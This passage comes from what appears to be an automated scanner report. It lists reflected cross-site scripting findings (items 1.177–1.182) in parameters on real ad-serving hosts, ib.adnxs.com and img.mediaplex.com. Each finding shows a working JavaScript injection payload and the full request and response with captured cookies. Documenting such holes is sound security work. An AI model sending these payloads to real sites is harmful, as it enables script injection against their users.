Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:55:52 GMT
Content-Length: 1077

document.write('<a href="http://ib.adnxs.com/click/AAAAAAAACEAAAAAAAAAIQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAAuxe_kgAAAAA./cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00/referrer=http%3A%2F%2Fwww.drudgereport.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIB
...[SNIP]...

1.177. http://ib.adnxs.com/ab [custom_macro parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e306'%3balert(1)//5bb5c06a74 was submitted in the custom_macro parameter. This input was echoed as 7e306';alert(1)//5bb5c06a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=ZmZmZmZmAEBaIEHxY8z8PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBAgUCAAIAAAAATCCnlAAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+10005%2C+1297649601%29%3Buf%28%27c%27%2C+49470%2C+1297649601%29%3Buf%28%27r%27%2C+177675%2C+1297649601%29%3Bppv%289163%2C+%276878292452198102128%27%2C+1297649601%2C+1297822401%2C+49470%2C+25661%29%3B&cnd=!9BV8Wwi-ggMQi-wKGAAgvcgBKOMJMWZmZmZmZgBAQhMIABAAGAAgASj-__________8BSABQAFjXNmAAaOQC&referrer=http://www.drudgereport.com/&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-17e306'%3balert(1)//5bb5c06a74&pp=AAABLiHxjW2aHsAUrhXeXy7HnjQEzy6mEJhGsA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0K-0oEi9BqslYpw4GThC965ufnbUW7BwJm5Gu783YwBw91KDpWzUohmJbpm2okwppa7yYI0lOlyW9fubMZ7jaRy0-IPoOVpmsh49NdEahLnmrg4ToC-HK_DZHW7Ae8cfPqIKT3MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:14:10 GMT
Content-Length: 1488

document.write('<a href="http://ib.adnxs.com/click/5zORMa3h-z97FK5H4Xr4PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=7BSW&n_cid=49470&crid=flower_vday_160x600_1999jpg&n_crid=177675&mpm=CPM&n_g=u&n_a=0&aids=7BSW-17e306';alert(1)//5bb5c06a74&n_price=1.742597&n_bust=1297649601&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-Xgraph-_-xvday1999-_-vday%26cm_mmca1%
...[SNIP]...

1.178. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca016'%3balert(1)//5fa073185f6 was submitted in the redir parameter. This input was echoed as ca016';alert(1)//5fa073185f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=311&inv_code=cm.dailymail&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.dailymail%2Fron_052010%3Bnet%3Dcm%3Bu%3D%2Ccm-8533902_1297647301%2C11d765b6a10b1b3%2Chealth%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D572356%3Bcontx%3Dhealth%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.rdst11%3Bbtg%3Dcm.rdst12%3Bbtg%3Dcm.polit_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.shop_h%3Bbtg%3Dcm.tech_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa5%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.af1%3Bbtg%3Dmm.ai1%3Bbtg%3Dmm.al5%3Bbtg%3Dmm.am5%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.as1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dan.51%3Bbtg%3Dan.5%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dex.49%3Bbtg%3Ddx.16%3Bbtg%3Dqc.a%3Bord%3D3412338%3Fca016'%3balert(1)//5fa073185f6 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIv48BEAoYASABKAEwi43i6gQQi43i6gQYAA..; uuid2=4760492999213801733; anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIjngQChgBIAEoATCKjuLqBAoSCL-PARAKGAEgASgBMIuN4uoEEIqO4uoEGAE.; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb79863=5_[r^208WM>bcYx_nG*.:^g+C?enc=ZmZmZmZmAECE61G4HoX9PwAAAAAAAAhAhOtRuB6F_T9mZmZmZmYAQDqrGdMotboaBWHfHSmrEEIKh1hNAAAAAMs4AwA3AQAAZAEAAAIAAACILwMAploAAAEAAABVU0QAVVNEACwB-gBYDgAAUAcBAgUCAAUAAAAAqhzHbAAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+10005%2C+1297647370%29%3Buf%28%27c%27%2C+49470%2C+1297647370%29%3Buf%28%27r%27%2C+208776%2C+1297647370%29%3Bppv%289163%2C+%271926050977599302458%27%2C+1297647370%2C+1297820170%2C+49470%2C+23206%29%3B&cnd=!txQdIwi-ggMQiN8MGAAgprUBKAAxZmZmZmZmAEBCEwgAEAAYACABKP7__________wFIAFAAWNgcYABo5AI.&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mCZ#-r-!h!'HeE4TR!f?sYIm%X3Zp'bpV[vypRsrn$Z9K/W<P_ZTLv<7h(.63:>>Yf$^-@VYpnGhEl:Cu8vlI:i:B2V3rfi<wSZ4:l'jt8^l@>+J-D!CW=-L5P3V:*cp*s6J2Dm-cE(PSZ6)?.HX%HgNom6fYB5AqBM>35QZDs7IAdTV:i(Zen>alciVCDxC?5e0du@Tn2!mB9m/p):MJN/xr/?SGEu6U+H0tK(AOZTn)XlSDJOj2rk/[c2J<xD?g!Jz12S<Ls:>]w:Ml[DhVWJ2-P1shhC:7QXbK-0fJ4l(vmb#mn<(-w>85h!YrKc7GvAnY_M[TK-MHJ.k53yQv$*WQwj:$fp`yb3(dE==5Z#4!RNdfO'HPL9bHg$F]0Xd>Ku0zL#)BVcXlLTo3_OCCWhQ:W3Qt(h>3.z(qrY.gKwpFehGeYv!m*Q#xs(Q<ag5cC`d]p[x%e=mX)BjLqk05tsu%UmgWaNp$b:cIF+n03`_3=ASFI/MNbyctA0]?x4V-:Xzq!0'I1a'.Q/N8QTJK))xnNxMcwDX5>pKj=p]ww++74CZ1uUBI)2)rwmSf`90S(aG*0d+%d[5Qz[RKvWH?k.V%9jMiWo0QW:]S$ZP>%0m7qzHdJf3UzM-%DF/wBu=aWG>:/wu+aFbayBOlb0r+WF(LbE>MxDP9Vs<O^>[S6R!vz!=j?E$USn+; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 14 Feb 2011 01:36:10 GMT
Content-Length: 1187

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.dailymail/ron_052010;net=cm;u=,cm-8533902_1297647301,11d765b6a10b1b3,health,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...
g=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3412338?ca016';alert(1)//5fa073185f6">
...[SNIP]...

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d9f"%3balert(1)//d7cf6a05065 was submitted in the mpck parameter. This input was echoed as 90d9f";alert(1)//d7cf6a05065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D572158616790d9f"%3balert(1)//d7cf6a05065&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:15 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6686
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-4?mpt=572158616790d9f";alert(1)//d7cf6a05065\" target=\"_blank\">
...[SNIP]...

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fb5"%3balert(1)//6fd56155f2e was submitted in the mpvc parameter. This input was echoed as e3fb5";alert(1)//6fd56155f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5"%3balert(1)//6fd56155f2e&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:23 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6662
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5";alert(1)//6fd56155f2ehttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&clickTag=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,7773
...[SNIP]...

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de4ec"%3balert(1)//371d15fe709 was submitted in the placementid parameter. This input was echoed as de4ec";alert(1)//371d15fe709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014de4ec"%3balert(1)//371d15fe709& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:25 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6326
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014de4ec";alert(1)//371d15fe709&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c55"%3balert(1)//4a80fa0abd1 was submitted in the mpck parameter. This input was echoed as 49c55";alert(1)//4a80fa0abd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D21007378077849c55"%3balert(1)//4a80fa0abd1&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
